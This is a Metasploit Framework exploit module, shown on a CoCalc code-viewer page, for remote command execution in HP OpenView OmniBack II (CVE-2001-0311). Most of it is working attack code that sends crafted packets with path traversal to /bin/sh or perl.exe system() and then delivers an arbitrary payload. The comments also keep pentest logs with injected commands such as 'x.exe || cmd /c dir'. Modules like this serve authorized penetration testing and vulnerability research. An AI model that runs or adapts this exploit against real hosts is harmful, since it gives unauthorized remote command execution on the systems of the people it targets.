Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/exploits/multi/misc/openview_omniback_exec.rb
19511 views
1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5
6
class MetasploitModule < Msf::Exploit::Remote
7
Rank = ExcellentRanking
8
9
include Msf::Exploit::Remote::Tcp
10
11
def initialize(info = {})
12
super(
13
update_info(
14
info,
15
'Name' => 'HP OpenView OmniBack II Command Execution',
16
'Description' => %q{
17
This module uses a vulnerability in the OpenView Omniback II
18
service to execute arbitrary commands. This vulnerability was
19
discovered by DiGiT and his code was used as the basis for this
20
module.
21
22
For Microsoft Windows targets, due to module limitations, use the
23
"unix/cmd/generic" payload and set CMD to your command. You can only
24
pass a small amount of characters (4) to the command line on Windows.
25
},
26
'Author' => [ 'hdm', 'aushack' ],
27
'License' => MSF_LICENSE,
28
'References' => [
29
['CVE', '2001-0311'],
30
['OSVDB', '6018'],
31
['BID', '11032'],
32
['URL', 'http://www.securiteam.com/exploits/6M00O150KG.html'],
33
],
34
'Platform' => ['unix'], # win
35
'Arch' => ARCH_CMD,
36
'Privileged' => false,
37
'Payload' => {
38
'Space' => 1024,
39
'DisableNops' => true,
40
'Compat' =>
41
{
42
'PayloadType' => 'cmd',
43
'RequiredCmd' => 'generic perl telnet',
44
}
45
},
46
'Targets' => [
47
[ 'Unix', {}],
48
[ 'Windows', {}],
49
],
50
'DisclosureDate' => '2001-02-28',
51
'DefaultTarget' => 0,
52
'Notes' => {
53
'Reliability' => UNKNOWN_RELIABILITY,
54
'Stability' => UNKNOWN_STABILITY,
55
'SideEffects' => UNKNOWN_SIDE_EFFECTS
56
}
57
)
58
)
59
60
register_options(
61
[
62
Opt::RPORT(5555)
63
]
64
)
65
end
66
67
def check
68
if (target.name =~ /Unix/)
69
connect
70
71
poof =
72
"\x00\x00\x00.2" +
73
"\x00 a" +
74
"\x00 0" +
75
"\x00 0" +
76
"\x00 0" +
77
"\x00 A" +
78
"\x00 28" +
79
"\x00/../../../bin/sh" +
80
"\x00\x00" +
81
"digit " +
82
"AAAA\n\x00"
83
84
sock.put(poof)
85
sock.put("echo /etc/*;\n")
86
res = sock.get_once(-1, 5)
87
disconnect
88
89
if !(res and res.length > 0)
90
vprint_status("The remote service did not reply to our request")
91
return Exploit::CheckCode::Safe
92
end
93
94
if (res =~ /passwd|group|resolv/)
95
vprint_status("The remote service is exploitable")
96
return Exploit::CheckCode::Vulnerable
97
end
98
99
return Exploit::CheckCode::Safe
100
end
101
102
if (target.name =~ /Windows/)
103
connect
104
105
poof =
106
"\x00\x00\x00.2" +
107
"\x00 a" +
108
"\x00 0" +
109
"\x00 0" +
110
"\x00 0" +
111
"\x00 A" +
112
"\x00 28" +
113
"\x00\\perl.exe" +
114
"\x00\x20-e\x20system(dir)\x00\x00" +
115
"digit " +
116
"AAAA\n\x00"
117
118
sock.put(poof)
119
res = sock.get_once(-1, 5)
120
disconnect
121
122
print_status(res.to_s)
123
124
if !(res and res.length > 0)
125
print_status("The remote service did not reply to our request")
126
return Exploit::CheckCode::Safe
127
end
128
129
if (res =~ /V.o.l.u.m.e/) # Unicode
130
print_status("The remote service is exploitable")
131
return Exploit::CheckCode::Vulnerable
132
end
133
134
return Exploit::CheckCode::Safe
135
end
136
end
137
138
def exploit
139
if (target.name =~ /Unix/)
140
connect
141
142
poof =
143
"\x00\x00\x00.2" +
144
"\x00 a" +
145
"\x00 0" +
146
"\x00 0" +
147
"\x00 0" +
148
"\x00 A" +
149
"\x00 28" +
150
"\x00/../../../bin/sh" +
151
"\x00\x00" +
152
"digit " +
153
"AAAA\n\x00"
154
155
sock.put(poof)
156
sock.put(payload.encoded + ";\n")
157
res = sock.get_once(-1, 5)
158
159
if !(res and res.length > 0)
160
print_status("The remote service did not reply to our request")
161
disconnect
162
return
163
end
164
165
print(res)
166
167
handler
168
disconnect
169
end
170
171
if (target.name =~ /Windows/)
172
173
# aushack
174
#
175
# Tested during pen test against Windows 2003 server.
176
# Windows Service details:
177
# - Data Protector Inet
178
# -> [HP OpenView Storage Data Protector] - Backup client service
179
# -> "C:\Program Files\OmniBack\bin\omniinet.exe"
180
# -> OmniInet service for Windows NT
181
# -> File version: 6.0.0.0
182
#
183
# This needs to be cleaned up later. Preferably using the Windows/cmd/perl payloads.
184
#
185
# Notes:
186
# I was unable to use directory traversal, OR (||) or AND (&&) techniques to directly run cmd.exe
187
# Perhaps a difference in Windows/Unix code? Logs:
188
#
189
# 11/11/2008 12:18:37 PM INET.5112.1884 ["inetnt/allow_deny.c /main/dp56/dp60_fix/2":496] A.06.00 bDPWIN_00384
190
# A request 28 (..\foo.exe) came from host [attacker] which is not a cell manager of this client
191
#
192
# 11/11/2008 12:18:37 PM INET.5112.1884 ["inetnt/ntinet.c /main/dp56/dp60_fix/2":5170] A.06.00 bDPWIN_00384
193
# [RxNtIntegUtil] parameter refused: ..\foo.exe
194
#
195
# 11/11/2008 12:21:59 PM INET.5112.1884 ["inetnt/allow_deny.c /main/dp56/dp60_fix/2":496] A.06.00 bDPWIN_00384
196
# A request 28 (x.exe || cmd /c dir > c:) came from host [attacker] which is not a cell manager of this client
197
#
198
# 11/11/2008 12:21:59 PM INET.5112.1884 ["inetnt/ntinet.c /main/dp56/dp60_fix/2":5170] A.06.00 bDPWIN_00384
199
# [RxNtIntegUtil] parameter refused: x.exe || cmd /c dir > c:
200
#
201
# 11/11/2008 12:22:40 PM INET.5112.1884 ["inetnt/allow_deny.c /main/dp56/dp60_fix/2":496] A.06.00 bDPWIN_00384
202
# A request 28 (perl.exe && cmd /c dir >) came from [attacker] which is not a cell manager of this client
203
#
204
# 11/11/2008 12:22:40 PM INET.5112.1884 ["inetnt/ntinet.c /main/dp56/dp60_fix/2":5170] A.06.00 bDPWIN_00384
205
# [RxNtIntegUtil] parameter refused: perl.exe && cmd /c dir >
206
207
connect
208
209
poof =
210
"\x00\x00\x00.2" +
211
"\x00 a" +
212
"\x00 0" +
213
"\x00 0" +
214
"\x00 0" +
215
"\x00 A" +
216
"\x00 28" +
217
"\x00\\perl.exe" +
218
"\x00\x20-esystem(#{payload.encoded})\x00\x00" +
219
"digit " +
220
"AAAA\n\x00"
221
222
sock.put(poof)
223
# sock.put(payload.encoded + "\n")
224
res = sock.get_once(-1, 5)
225
226
if !(res and res.length > 0)
227
print_status("The remote service did not reply to our request")
228
disconnect
229
return
230
end
231
232
print(res)
233
234
handler
235
disconnect
236
end
237
end
238
end
239
240